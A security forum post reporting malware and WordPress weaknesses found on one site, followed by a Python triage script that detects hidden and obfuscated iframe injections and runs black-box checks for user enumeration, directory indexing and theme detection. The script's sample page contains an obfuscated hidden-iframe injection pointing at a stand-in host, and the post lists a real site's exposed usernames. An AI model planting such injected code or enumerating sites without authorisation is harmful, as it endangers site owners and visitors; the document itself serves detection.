Author Topic: malicious code detected on Website!


polonus
malicious code detected on Website!
« on: August 08, 2015, 12:25:07 AM »
Re: https://www.virustotal.com/nl/url/67a62a9af440dfc095be7e2efea960018adfedf6dafafa12c74c5582782549cb/analysis/1438984809/
Re:
ISSUE DETECTED     DEFINITION                 INFECTED URL
Website Malware    mwjs-iframe-hidden1?v25    -http://ozonopuntura.com
Website Malware    mwjs-iframe-hidden1?v25    -http://ozonopuntura.com/404testpage4525d2fdc
Website Malware    mwjs-iframe-hidden1?v25    -http://ozonopuntura.com/404javascript.js
Website Malware    mwjs-iframe-hidden1?v25    -http://ozonopuntura.com/tratamientos/
Website Malware    mwjs-iframe-hidden1?v25    -http://ozonopuntura.com/testimonios/
Website Malware    mwjs-iframe-hidden1?v25    -http://ozonopuntura.com/?page_id=11
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-hidden1?v25

Alerted on scan here: https://urlquery.net/report.php?id=1438984893423

Theme Creare Site 1.2.5 vulnerable, see the changes for why: https://themes.trac.wordpress.org/changeset?old_path=/creare-site/1.2.5&new_path=/creare-site/1.2.6 -> https://www.web8.ro/

The theme listed here is the active theme found in the HTML source of the page. A comprehensive assessment should include checking for other themes that are installed but not active, as these can also contain exploitable security vulnerabilities. In a "black box" assessment or penetration test, detection of all themes can be undertaken by brute forcing the theme paths. Alternatively, if you have access to the host, you could simply remove all unused themes.

Warning User Enumeration is possible
The first two user IDs were tested to determine if user enumeration is possible.

User ID 1 : admin
User ID 2 : liliacortez

Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled
/wp-content/plugins/ disabled

See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fozonopuntura.com

jQuery code here with a known sink: https://wordpress.org/support/topic/jquery-migrate-vulnerability-or-false-alarm
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fozonopuntura.com%2Fwp-includes%2Fjs%2Fjquery%2Fjquery-migrate.min.js%3Fver%3D1.2.1 (but no sources, as far as one can establish).

See inside code here: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fozonopuntura.com%2Fwp-includes%2Fjs%2Fwp-emoji-release.min.js%3Fver%3D4.2.4 - WordPress core script issue:
https://core.trac.wordpress.org/attachment/ticket/31242/31242.18.patch

polonus (volunteer website security analyst and website error-hunter)
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
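Added example, not from polonus's post and not the code of any scanner he links: a small Python triage script for two kinds of finding reported above, the hidden-iframe injection behind the "Website Malware" rows and the black-box WordPress checks (author-ID enumeration via the /?author=N redirect, directory indexing, and installed-theme detection through each theme's style.css header, which is what "brute forcing the theme paths" probes). The HTTP fetch is left out so it runs offline; the page, redirect, listing and stylesheet below are constructed samples on fictitious hosts (shop.example, bad.example), and the hidden-iframe heuristics are my own, not the Sucuri mwjs-iframe-hidden1 signature.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote


class HiddenIframeFinder(HTMLParser):
    """<iframe> tags hidden from the visitor: 0/1 px size, display:none,
    visibility:hidden or a large negative offset (heuristic, not a vendor signature)."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            m = re.match(r"\s*(\d+)", a.get(dim, ""))
            if m and int(m.group(1)) <= 1:
                reasons.append(f"{dim}={m.group(1)}")
        style = a.get("style", "").lower().replace(" ", "")
        reasons += [s for s in ("display:none", "visibility:hidden") if s in style]
        if re.search(r"(left|top):-\d{3,}px", style):
            reasons.append("off-screen")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})


def find_hidden_iframes(html):
    """Literal hidden <iframe> tags in the served HTML."""
    p = HiddenIframeFinder()
    p.feed(html)
    return p.findings


# Injected scripts usually emit the frame via document.write and dodge naive greps
# by splitting strings ('<ifr'+'ame') or %XX-escaping them; undo both before matching.
_CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")
_DOCWRITE_IFRAME = re.compile(r"document\.write\s*\(.*?<\s*iframe", re.I | re.S)
_OBFUSCATION = re.compile(r"\b(unescape|String\.fromCharCode|eval)\s*\(")


def find_scripted_iframes(html):
    """Inline <script> blocks that write an iframe with document.write."""
    hits = []
    for script in re.findall(r"<script[^>]*>(.*?)</script>", html, re.I | re.S):
        joined = unquote(_CONCAT.sub("", script))
        if _DOCWRITE_IFRAME.search(joined):
            hits.append({"obfuscated": bool(_OBFUSCATION.search(joined)),
                         "snippet": joined.strip()[:80]})
    return hits


def author_from_redirect(status, headers):
    """WordPress redirects /?author=N for an existing user ID to /author/<slug>/,
    so the slug (user_nicename, normally the login) leaks. Returns slug or None."""
    if status not in (301, 302):
        return None
    m = re.search(r"/author/([^/?#]+)/?$", urlparse(headers.get("Location", "")).path)
    return m.group(1) if m else None


def directory_indexing_enabled(status, body):
    """Apache/nginx autoindex listings carry an 'Index of /...' title."""
    return status == 200 and re.search(r"<title>\s*Index of /", body, re.I) is not None


def theme_from_stylesheet(status, body):
    """/wp-content/themes/<name>/style.css is served for every installed theme,
    active or not, and its comment header names the theme and version."""
    name = re.search(r"^\s*\*?\s*Theme Name:\s*(.+)$", body, re.M) if status == 200 else None
    if not name:
        return None
    ver = re.search(r"^\s*\*?\s*Version:\s*(\S+)", body, re.M)
    return {"name": name.group(1).strip(), "version": ver.group(1) if ver else None}


# Constructed samples (fictitious hosts, not captured from any real site).
PAGE = """<html><head><script>
document.write(unescape('%3Cifr'+'ame src="http://bad.example/in.php" width="1" height="1" '
 + 'style="visibility:hidden;position:absolute;left:-5000px"%3E%3C/ifr'+'ame%3E'));
</script></head><body><p>Welcome</p>
<iframe src="http://bad.example/x.html" width="0" height="0" style="display:none"></iframe>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
</body></html>"""
AUTHOR_REDIRECT = (301, {"Location": "http://shop.example/author/admin/"})
UPLOADS_LISTING = (200, "<html><head><title>Index of /wp-content/uploads</title></head></html>")
THEME_CSS = (200, "/*\nTheme Name: Twenty Fifteen\nVersion: 1.2\n*/\nbody {}")
```

On the sample page the visible 560x315 embed is left alone, the display:none frame is reported from its tag, and the document.write frame is only caught after the `'+'` splits and %3C escapes are undone, which is why a plain grep for `<iframe` misses that class of injection. For the theme check, request `/wp-content/themes/<candidate>/style.css` for each name in a wordlist and feed status and body to `theme_from_stylesheet`; any hit is an installed theme, active or not. Treat all of these as first-pass indicators to confirm by hand, not as verdicts.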